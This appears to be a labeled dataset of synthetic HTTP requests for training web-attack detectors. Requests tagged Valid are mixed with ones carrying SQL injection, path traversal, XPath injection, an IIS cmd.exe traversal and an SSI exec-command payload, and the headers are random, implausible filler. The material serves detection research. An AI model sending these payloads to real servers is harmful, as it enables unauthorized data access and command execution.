TE: deflate;q=0.1
Trailer: From
User-Agent: Mozilla/4.2 (X11; U; Linux i586 7.8; tl-6y; rv:2.3.1) Gecko/25235068
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3985x064
Via: ss1R/2.7 www.tn52oseg.gif, FTP/6.4 51.153.64.48, HTTP/9.5 56.130.255.40
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 584 www.to8Zs.jpeg "prpRute" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49013
Start - Id: 42038
class: SqlInjection
GET /nemitearto/eCZ1.m/uR2Sha3TWbRq6mhhFzr/hexEo/7f1ryb/reotbboeianRrcw/res4Aeitydgdehd/h@363Rq8ili9IaEEe/nuKT0.J-z.jpeg?3C7MdY=tjP&eetryi=kautoexecs&i0i67tr=16661185&rsl=%29tan7adLa&idth=u6OV19B0Oz_g&mNV8HTMosystemXD_=m4%26t3mms+iedisy&daomd=%27++%29+UNION+ALL+++SELECT++++007%2C1604%2C0620%2C30%2C521+FROM+twan4E++++WHERE+++%28++%27%27+++%3D%27&j0s=syJgp-ICPz15&Mohdhtto=mn7g4e9orrtiamJee&roqlssdA=sm5dtlaepd1s8m7n HTTP/1.0
Host: www.nthbhl.biz
Connection: tliaHgjN
Accept: text/html, audio/basic;q=0.3, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rEa1t-iite;q=0.9, tlepbh-e, hilp-phh9;q=0.9, vdxemelw-mctrds9;q=0.6, iEvhlhsS-ncw;q=0.1
Cache-Control: no-store
Client-ip: 86.202.146.12
Cookie: wqhe8y1tf=awp-d<
Cookie2: $Version="633"
Date: Sun, 03 Jan 10 21:01:51 UTC
ETag: "_N1zf0lhG2wuFUyPI7"
Expect: htuts=nr7wu2he
From: idgece0c@Iierx.org
If-Modified-Since: Mon, 02 Apr 07 05:26:46 UTC
If-Unmodified-Since: Thu, 26 Aug 04 07:40:34 CET
If-Match: *
If-None-Match: "kJ40R0p6FP.xEpZ"
If-Range: Mon, 15 Dec 08 04:20:27 UTC
Max-Forwards: 46
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: 2ru2 aAiEm=3ginrn
Range: -69
Referer: /etre.mdb
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.1 (X11; U; Linux i586 1.8; Fh-1d; rv:5.2.0) Gecko/57676196
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: 2.5 www.ieet.html, 0.1 236.172.181.210
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42038
Start - Id: 33241
class: Valid
POST /a@w/-50xA2/zoJN650zgt/9rrr3SwuXitv7a.js? HTTP/1.0
Content-Length: 131
Content-Language: hNtwzadx,ueTiom,mlh
Content-Encoding: gzip
Content-Location: http://www.qnaawlm.cz/bEmonlz/eselva/do7eeea/trtrttf/nssan.asp
Content-MD5: ZXdyTDFzYWJtZUVoOHRrdg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Nov 08 17:28:27 CET
Last-Modified: Sat, 26 Jul 08 11:53:43 GMT
Host: www.0lct0v2.com:80
Connection: close
Accept: image/*;q=0.2, video/*;q=0.4, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: Nen-o0mro, nszdi5-a;q=0.5, dc2nGb-h;q=0.6, 2oe-2e;q=0.9, R-ieSNa
Cache-Control: no-store
Client-ip: 234.29.15.136
Cookie: eamo=78309187
Cookie2: $Version="7"
Date: Fri, 18 May 07 05:14:30 GMT
ETag: W/"5wbP3EHF8ddiLff"
Expect: snUte=rdguqea;iiitt=aOayhh
From: erTsnsa@9ala.gov
If-Modified-Since: Thu, 20 Mar 08 12:55:57 UTC
If-Unmodified-Since: Thu, 26 Aug 04 03:51:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Feb 08 06:13:14 GMT
Max-Forwards: 132
MIME-Version: 7.1
Pragma: slsx=u
Proxy-Authorization: Basic VHM3azp5ZW9vdG1k
Authorization: NTLM blRndHM3bG5sc3RydHM1ZWxydTdocmVpZW9PbmN0bmVlaHRhcWhmamU=
Range: 7-,628-,0904-1
Referer: /aitail/sej1ru/Oo5h1ude/ondt/m5ydIsg.gif
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: a6Wz0M98 http://www.3iannn.net
UA-CPU: Sparc
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0112x4433
Via: 4.0 235.211.34.115
Transfer-Encoding: identity
Upgrade: nldlr/7.8, thwau/5.3, EiaE/2.5, Wpkdip/0.6
Warning: 387 www.AeHg.jpg:7663 "tkui7EzbN" "Sat, 27 Jan 07 16:30:28 GMT"
X-Forwarded-For: 252.248.3.10
X-Serial-Number: 979942
----: -----------------------------------
~~~~~: ~~~~~~~~~~

enlekHainaeys7o=hz@R6XFx1Ae&oth=psAIa&0tphnnooTr=oltoA"[lbBorcAkre t&lq=4784187800&hpueout=9534&1tn=8287642&4W1J0qL=8&e4tt=72

End - Id: 33241
Start - Id: 44670
class: PathTransversal
GET /hiWMAW/ItsleirytdoAo/elPGP@GBmQ.8BSGw.js? HTTP/1.1
Host: 35.114.134.233
Connection: keep-alive
Accept: application/rtf;q=0.1, application/x-tar;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: irhjEt=ah
Client-ip: 47.118.94.95
Cookie: aD3rB=./.././.././.././../
Cookie2: $Version="8"
Date: Sun, 19 Jul 09 23:23:43 CET
ETag: W/"ZPtdydKjD0o8GzDZSp"
From: esO7ean@to9rgrv.org
If-Modified-Since: Wed, 07 May 08 24:58:59 CET
If-Unmodified-Since: Fri, 03 Jul 09 05:07:04 UTC
If-Match: "w@e_4q2EE_pN1PVrVj@"
If-None-Match: "M7BsGokVxIjDY4Y5yn7"
If-Range: Sun, 14 Jan 07 21:29:09 GMT
Max-Forwards: 57
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: etOx mtcLY=aeczc
Authorization: Digest algorithm=MD5-sess
Range: 267-5496
Referer: /aluo/cznyu/oiBqnf/ea6Emtac/twdggo.shtml
TE: chunked,trailers
User-Agent: rlceemOpe/6.1.8.4
UA-Disp: 2213,7553,16
UA-OS: WinNT
UA-Pixels: 0638x7767
Via: 9.8 www.qiyU.gif, FTP/1.5 134.144.103.89
Transfer-Encoding: compress
Upgrade: tvmai/7.6, 6reo/8.5, nstpt/2.4, yeianr/0.7
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 72425044847598734540

null

End - Id: 44670
Start - Id: 48605
class: XPathInjection
POST /anMe1B/unI0uVwTanf/aVFaPGv6NqMB8Jzw4/Wnph-pojfiJx2-WN/log0/7bwtfdxte7aSep6/cltw/unraltud/Tw/i2@Ni949kz5.wv/nbqlieltanom/rt3v8htaccesNYRid.jpeg? HTTP/1.1
Content-Length: 301
Content-Language: r,pyerg
Content-Encoding: compress
Content-Location: /S7r72/9pahEtt.asp
Content-MD5: ZHhvRGdlZXd3b2dudGt2aA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Feb 05 05:06:24 GMT
Last-Modified: Sun, 26 Feb 06 09:56:03 GMT
Host: www.enneettoe.fr
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: cp-950, isiri-3342;q=0.6, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: e-e1;q=0.5, lo-eh1huese;q=0.0, dcbsehr-N, aoeirc-iosesie;q=0.4
Cache-Control: no-cache
Client-ip: 6.142.29.16
Cookie: 5Xenbieuni=lscripts s;9n=a;1b8RuvhrsBM=i e+a80ahNahlt;a1lBegbmg=is  
Cookie2: $Version="95"
Date: Fri, 23 Mar 07 17:56:35 UTC
ETag: W/"8nwUpGX1@vrk.uB0bqTM"
Expect: 100-continue
From: aUfef@ct1nr.cz
If-Modified-Since: Thu, 26 Oct 06 18:39:55 CET
If-Unmodified-Since: Sat, 26 Apr 08 09:27:27 CET
If-Match: "Mm83On1z6kdrQw3g0D"
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: Tue, 08 Jun 04 24:15:13 GMT
Max-Forwards: 0945
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic TWx1Zzpic3JvZWg=
Authorization: ndnhp laeasbte=tcyn
Range: 3-574
Referer: http://bpFet.uk/vneeosA.gz
TE: deflate;q=0.4
Trailer: If-Range
User-Agent: dhatsul/4.9.9.8
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: dmnaa/6.2 www.eaauhil.html, mny/8.0 241.58.186.24
Transfer-Encoding: tFultt
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 912 63.37.169.211 "zae8nine1efbsarunme" "Fri, 13 Jun 08 08:02:48 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 9078017597959591
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

NnetcatUY=9RC.k-nA&lgigInrabcbaL=gtMAH1p&irMtbnietr=nc_FwMd8J&eet1hnrmkhtwea=7651&PtezXRx=IRdn'     or 6    <    count(path/child::*)     or   'Nsetlnai'    = '&t7eskr76=7y&raheam=ztestoTainab8e&ei=b_b54&cx@BLsystem=tpapdeoiheod+cu&lbWit4prtr8=aE5a7alikena&iznOdltoErojh=665108

End - Id: 48605
Start - Id: 29723
class: Valid
GET /oQ8tI87jcZ@Ll0jIY/Zj8dhLQ7-wgetaPm3k/nz9g0DZnlgSHFEs@/har6rlatcsnptsdalo4/oathnjeeraehte/.aRginput.19-u_PR.aspx?ntc=pc+mhebodymebtprocessing-instruction6i&tetaAtG=3bf0gc-uUvY-&kjmdithdD1nizii=l&AoPvbscriptx=dfeGJa9wYvt&Aouom7=m0&SCzKY4betweenBoj=85&eOdo=n73M45no&eolTnsnencdhsa4=1otngfbewnc&i0trlnlea=JlneqaedccLpe8iol&h7l=0355308&Urtdyef=-&J8INa6adWdcene=poX.L7P9u.&pohqh=72Xk7 HTTP/1.1
Host: 110.176.216.204
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=711
Client-ip: 65.241.145.31
Cookie: YH-.IW2boot.ini=oDacmdlh$d>elErsiery;otiank=(w4egroup byo0ar6oh2h;cwaFohasssacnu=hcsett16xlo92a:;leillheiFexa=ue;hursmS8tegpn1po=ohobe-i/a;7ssogine7A=1804222
Cookie2: $Version="061"
Date: Thu, 15 Dec 05 06:43:19 GMT
ETag: W/"exghmn3QI5.fS-n"
Expect: 100-continue
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Tue, 24 Jan 06 16:36:25 UTC
If-Unmodified-Since: Sat, 30 Dec 06 14:26:37 UTC
If-Match: "-npcYNkrH8Kp5-qOUr6n"
If-None-Match: "J0BZVr38p-EWlqy"
If-Range: *
Max-Forwards: 440
MIME-Version: 3.4
Pragma: wteyt='eetininn'
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ootai ytrdsee=hhwhfeo
Range: 8-,7343-94485
Referer: http://7u9ip.it/gttxbNes.pl
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: illpei/7.9
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x959
Via: FTP/1.4 146.200.236.24, FTP/7.2 www.incitlhk.png, FTP/7.2 www.aNRT3.htm
Transfer-Encoding: deflate
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 520 167.29.73.134 "smwarc7uRes0do" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 2911766071168
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29723
Start - Id: 22878
class: Valid
GET /c4q90ew/cS7q.7xyKhadbodyIJ/PcatOxnI2VVHn/dl9I0keydhahhaaA/41kCxxQ5ZMJO2mygICS/tnoIpi/tiS-UBm5jEBvsRtn-QE/1.WJLh/5jvFQDsp/0bmin/cv3VzeUk4Xytf0A7Oo3/siGe.php?gt=bs1wDK.4t&T738IWV=p+lSo&rnoimif1tqe=30&soea0fitot6=%3Fhls&siidil=55646910&nroinRsa0t5Vow=ie+xmlstmpnode&Na7-DcopyGN.wjy=8301&_Cia=Ry-t%7C&bMeeaofm=11&e-Zl=%3Bs&-._Ek9between3d0H5=ehtaWjyr%28&RHpA4-inf.eD=%5Br&UetonRiaetqdi=5180&hcnltstiteT0=savyeljacnrhiev&tc=cqr2RyeCaq HTTP/1.1
Host: 10.155.240.31
Connection: close
Accept: audio/basic
Accept-Charset: iso-8859-6, iso-8859-5, x-mac-cyrillic, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: ufc-ajarr;q=0.0, Eqaa-4tc, dbpqii-ieai, Lwrai-flppl1zh
Cache-Control: lm=9q6mu
Client-ip: 5.243.112.159
Cookie: RLNbinF=asrja;Ws6Ps=zF4d08x9o;.b7Xxty4L=sJQm_cO;dipjtchwrdw=45;-Ws.=4886114;hNPOlEaidyir=1Av170V
Cookie2: $Version="915"
Date: Sun, 21 Jan 07 24:23:09 UTC
ETag: W/"FjRAi8E2THaWXBoTN_"
Expect: 100-continue
From: ntsdz@D3mgaa.it
If-Modified-Since: Mon, 17 Aug 09 14:01:48 GMT
If-Unmodified-Since: Fri, 11 Aug 06 09:46:35 GMT
If-Match: "8AgeTjzEjdxyt.4v7"
If-None-Match: *
If-Range: *
Max-Forwards: 74
MIME-Version: 6.6
Pragma: Isena='katNiTut'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM SG8zdWliYWtiVWllYWMzcmJhbm9zbXl0c21QZ3Bjcm9tb3JuNW5hZG5laXNh
Range: 37032-5753,-977
Referer: /nntnrrte/rei9.php
TE: trailers,gzip;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 4.9; ea-8r; rv:1.7.1) Gecko/41738870
UA-CPU: x86
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
Via: ua9nh/9.8 www.z57urXwf.css:78685, FTP/3.2 106.182.240.13, t2gaRp/4.7 www.srem.png
Transfer-Encoding: deflate
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 312 56.128.98.138 "curonnltfRimjCnt" 
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22878
Start - Id: 28516
class: Valid
GET /eXxd4M0/doditgaNroifuuml/4di183Nm_y53v/5uAfynlpeIy/l0ttu2jl2enKha/avtitsnsfo7ventgfaeS/-Nlog_O1eByea6U/tdPp3ij.W8qJqk/t5lbih4nd/nJQz.jpeg?afo=iyoghiqL%3Fe%5D%5Dc&rAawaiIzhlitr=tufatcti0&elLedferueze=217582&8yh=2130707&7at=tao%7Exe%3CriteT4u&Xlewhcaorhgnhem=%25ualley+yn-u%3Dth3&dtnrsadtpczca=50298450&cjuss=8ulS6aFzgOeza&oerneo5t3ns=50805392&psRp=1229&ssn2s3=foroIOrd0uCoosnf&oMconnectH0au=lkkor&cOsre7uemdin=snrs HTTP/1.1
Host: 206.187.133.208
Connection: imhtrdh
Accept: */*;q=0.1
Accept-Charset: macintosh, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 0.102.184.162
Cookie: eaka8q=852966183;EziUnbh=omoheazw4esegegh;f3hhuk=voen>hp3i:ecmd;lfpaumi=uage75;eedbXnoacSg7sdG=228;replaceKUMjY8=s uyhnhFns)andiA
Cookie2: $Version="66"
Date: Sun, 30 Sep 07 21:38:22 UTC
ETag: W/"56y2QcstYYp.E36"
Expect: qewlhar=cela;fj8stj7
From: tlmuhe6G@iElga.org
If-Modified-Since: Thu, 25 Jan 07 17:36:12 CET
If-Unmodified-Since: Fri, 27 May 05 18:33:14 GMT
If-Match: "mGZu@dswMCodRSPWdW1"
If-None-Match: *
If-Range: Sat, 09 Sep 06 24:32:13 CET
Max-Forwards: 2001
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Hsay.st/trannnt/atcu/nxsempc/fmeipts7/enyoea.bin
Authorization: Basic b2xleGk6bERhc2E=
Range: 7-93,534-66746
Referer: /norUiP/pgmcnil.mpeg
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: 1f11rnernie1r340S
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: HTTP/0.4 www.rp2ec7.jpeg
Transfer-Encoding: deflate
Upgrade: ssc6/7.2
Warning: 910 www.legsia.css:7 "totaiqAI" "Tue, 27 Dec 05 09:24:47 CET"
X-Forwarded-For: 32.243.80.201
X-Serial-Number: 9412157070981544486
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28516
Start - Id: 48307
class: XPathInjection
GET /3lenmrd2isaa/2bv@Blhc1hCk3Y/sZl0nl/6QNLPa4MjxTD2HZ/sY5ixe8Preknxoa/66Ku2.q5x7ddK3xf/rWl/-3VA6WD.systemg/oie3qEQw2.MZe.asmx? HTTP/1.0
Host: 101.141.3.61
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: cdrf']   |    P  |   //user[ name/text(    )=    'aT7aa
Accept-Language: *;q=0.8
Cache-Control: max-age=6
Client-ip: 95.235.160.12
Cookie: OvCL1=ai 0naowi@Y;ergeqdsddseiiS=lqe;sLaoe6bois=supdatennfaeO0Oxukm;s7rm=yua;xiBeeypn8=$aRnh
Cookie2: $Version="584"
Date: Mon, 10 Nov 08 13:14:37 GMT
ETag: W/"il17cMn9pjHpSSRT"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 18:26:27 UTC
If-Unmodified-Since: Sat, 03 Feb 07 10:40:53 GMT
If-Match: "zG9P38WYLfA7KIj4gngx"
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: u4syo ea2e9=hTbrraye
Referer: /mpSw/gnEe/iuy9swg4.sh
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: nrtr@z http://www.jo0tobhp.it
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: Ief5/0.0 www.ayscels.jpg
Transfer-Encoding: identity
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 104 www.qtdputp.jpeg "at7y4uOnor" "Mon, 05 Mar 07 04:00:21 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48307
Start - Id: 23418
class: Valid
GET /TEvCtn/sPDL4/89gF9zZGfRo/ifkbTIh/imsaamszmUS/lPpIqDS6KckeY9/opa/6nswV-GkgCCnS/oiWqv02tn/idacteOtvAH3Trayws/zj8Csu16e.nsf?tb1ieIrc2isA=798714980&0bti1Crm=53&UVVY59P=3t2rtetn0Ef1fo&u1sPL=0ah5aRsodehsGo&om=3791082&tbp=39360&edraSx2oseuntoi=zM3&eshtgknce=qiqiwae HTTP/1.0
Host: www.IeehI1i.it:27
Connection: keep-alive
Accept: audio/x-wav;q=0.0, audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=969
Client-ip: 220.6.217.121
Cookie: y9iSbwLrioye=77;7lnente=555;snudNludnSazeri=pisnA
Cookie2: $Version="832"
Date: Wed, 23 Nov 05 21:49:47 GMT
ETag: "4GlJvF0PI@Dj9YXMxhp"
Expect: ct0sryeu=ahxnPgS;im4Rb4po
From: i1ejual@Eudncoe.st
If-Modified-Since: Thu, 08 Oct 09 24:33:17 GMT
If-Unmodified-Since: Mon, 21 Feb 05 11:39:34 CET
If-Match: "00CqBhzSSSNd@9o"
If-None-Match: *
If-Range: Sun, 10 Feb 08 11:29:08 CET
Max-Forwards: 3
MIME-Version: 5.5
Pragma: cel=rs
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: NTLM QWVpZThzbGF5cnJzMHJyMWVIcmZvcjNDNHVndW50NHNlYWRh
Range: -14180
Referer: http://www.ttoe.fr/t5Srmaeh/ns5ec/isT4nsvr/atnuer6.nsf
TE: gzip
Trailer: Referer
User-Agent: Mozilla/9.4 (X11; U; Linux i586 5.9; sh-ba; rv:4.5.1) Gecko/50914770
UA-CPU: StrongARM
UA-Disp: 528,388,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 134x126
Via: HTTP/1.5 78.49.5.204, FTP/0.1 www.hTieh.tiff
Transfer-Encoding: mwem9
Upgrade: kesgoe/3.7, tce9/6.9, aee0w/7.2, iyu/0.2
Warning: 969 190.205.124.28:1921 "Alhersnix9ottat" 
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 15233843
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23418
Start - Id: 43683
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 196.107.109.163:2
Connection: keep-alive
Accept: video/*, video/mpeg;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.3
Accept-Language: *
Cache-Control: min-fresh=73353
Client-ip: 177.192.198.50
Cookie: Ni8Mzwp7x=6613333230;jCK4Q_t9=dmeilnuadte
Cookie2: $Version="4"
Date: Tue, 09 May 06 21:53:32 GMT
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 13 Mar 06 12:28:26 GMT
If-Match: "rT54hzKaTJ98N_gjMy"
If-None-Match: *
If-Range: *
Max-Forwards: 596
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic cWlyaWNibjplb241ZWdp
Authorization: Digest algorithm=MD5
Range: 93-,413-489,269-
Referer: http://www.hgtt.it/p42z/whes/8lcnei.conf
TE: trailers,chunked
User-Agent: yulhbdcw (sxp@06@U; 5v6uKe; rnKlsb; sTn3IfsCx)
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/5.4 225.14.219.189
Transfer-Encoding: leanot
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43683
Start - Id: 40257
class: SSI
PUT /mOomd8j/wHibejfewm.pl? HTTP/1.0
Content-Length: 414
Content-Language: eTesswS
Content-Encoding: compress
Content-Location: http://www.1iluseq.be/ubbtfs/pda8Fla/eGhc/auleoE.nsf
Content-MD5: YWdlcm8xaTdzdXY1aG5yaw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Jul 04 10:26:59 UTC
Last-Modified: Tue, 08 Mar 05 13:55:47 CET
Host: 48.237.240.84
Connection: close
Accept: text/*, audio/basic;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.7, deflate, compress;q=0.0, compress;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 89.89.40.249
Cookie: cribrnhh=iuf(r;eoteededsneAn=O@](dSefv;hscbaurmiAxen=brb4itonmagee;insystemmhlog8xg=80896618;Owwwindow.openselect9ih=s1bTDO;ooEee4Qit=4305
Cookie2: $Version="26"
Date: Fri, 15 Dec 06 12:33:05 UTC
ETag: "QQY_.zvrgninbUH8uvt"
Expect: btet=Tut74;7Idnc=ann2tar0
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 13 May 08 15:33:43 CET
If-Unmodified-Since: Wed, 18 Apr 07 12:12:34 CET
If-Match: "GlwAzh2j02x7122YL.zr"
If-None-Match: *
If-Range: Sun, 10 Aug 08 12:04:25 UTC
Max-Forwards: 88
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM Tnh0YVM2YXRsVWFldGduc21lZmlkbm9uZGFpZW5zbk5HSXJ1eDRXaGhr
Authorization: snyr ulfeee=jffaf0t
Range: 7-1281,22479-
Referer: /wjsF/tt8a5/slote/1dlc/bbnstet.sh
TE: trailers,chunked
User-Agent: Mozilla/9.4 (compatible; Konqueror/5.3; Mac OS X; istdi8; rtahtddeD; 9e3tees)
UA-Disp: 3250,7812,32
UA-Color: color16
Via: eia/8.5 66.123.77.252:41, phx/9.2 99.143.231.63
Transfer-Encoding: identity
Upgrade: oNteno/8.5, frtD/2.1, iaoed/8.7
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

aonhdaowgnir=5&p6minutMmcq=i7e&mam23LEl=6569824&nsyaTnnmcecr=d48etSqet3opttnia&b-QE84QLE=97&JHhin1replace=<!--   #exec   cmd="c:\progra~1\mr\ty\11nttNs.exe   d:\emag\www.laassinira.org\no8dye5hiu\database.mdb    /x exporttofoxpro"-->&rfkCifo5=nm0VWqxkDs&ubTEi5=nste|dctnOeieea&tX.M13pc=;&-orvAEJ9jY4S=tahielH&e56Eetfelyere=ammem&txm=hye&gsFroig1iaojrIa=yAlsam ua9ane6ks)

End - Id: 40257
Start - Id: 24344
class: Valid
GET /irbespni/s5BRzLwSVc/lEtonM9Lv6Q7Jf/gkmrvaue/R2nntohs/ywcOK/1f6HQdelete6H.4YZ/qlpotma/3iAnftmiidtdan2BcoGX/7httpqF/ewrA1a.cgi?tmegE=auDo&63oySma=eed4Etoecnec&rmulaeyrentmBfs=467&ktyexRtypuemkt=ertkssa3rsT HTTP/1.0
Host: 13.119.209.133:479
Connection: close
Accept: video/*;q=0.9
Accept-Charset: euc-cn;q=0.5, iso-8859-9;q=0.1, x-mac-korean, shift_jis
Accept-Encoding: *;q=0.6
Accept-Language: u1Yoye-rnmadSi;q=0.9
Cache-Control: min-fresh=134
Client-ip: 27.238.88.211
Cookie: ieonuwuTcenop=uql-dsu;bfosde0ri=shtutc9togaur9;ier=i(;r1icetdessg=14320
Cookie2: $Version="7"
Date: Sat, 24 Apr 10 05:55:25 UTC
ETag: W/"Zh7VkrOSovWSth2"
Expect: niis7f=eutxj0i0;rzor=sDcnm
From: 5hRu@STpwssetis.be
If-Modified-Since: Tue, 16 May 06 12:59:12 GMT
If-Unmodified-Since: Tue, 08 Apr 08 10:50:13 CET
If-Match: *
If-None-Match: "6l_6gkxahvu-@3u9hPfE"
If-Range: *
Max-Forwards: 493
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM ZXNJZ3JOdGNhaG53Y29jSThkdGR0ZTBsbHJpdGV1MHJ1ZXNzbmhyZ2ZudFJpcGU=
Range: 3174-4551,6064-
Referer: http://ocsxOy.st/Tllj/txniioYe/aapndr.conf
TE: deflate,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/8.1 (compatible; 7Utyi; Win 9x; nrew2e; enT2iEHst)
UA-CPU: StrongARM
UA-Disp: 544,888,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 352x5203
Via: 0.7 www.0dbr.jpeg, 4.0 127.240.165.179:72, 7.3 138.17.55.45
Transfer-Encoding: identity
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 200.38.79.148
X-Serial-Number: 6737813475044771
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24344
Start - Id: 18496
class: Valid
GET /mhl0Dey/ltuliEoOjietc5o/wJJ2lU/rbneehuvzati88rhi/hV-E0EE/yfurri.png?hxmUpdOurstx=0%25nThhttpn%26%3B&wzXc_@e=aied%7EwuihixE9ut&QeeML0usr=gciehucnaso2&ezkqIespae=nenF&mdoo4=34&nS5=lgs%29&Txrwqeiinr=i0fa&aaDifIemw=lh7A.go HTTP/1.1
Host: 15.171.247.204:80
Connection: fheErTl2
Accept: */*
Accept-Charset: x-mac-icelandic, big5;q=0.0, iso-8859-8;q=0.4, iso-8859-6;q=0.2, ks_c_5601-1987;q=0.1
Accept-Encoding: identity;q=0.3, deflate, gzip, identity;q=0.7
Accept-Language: *;q=0.5
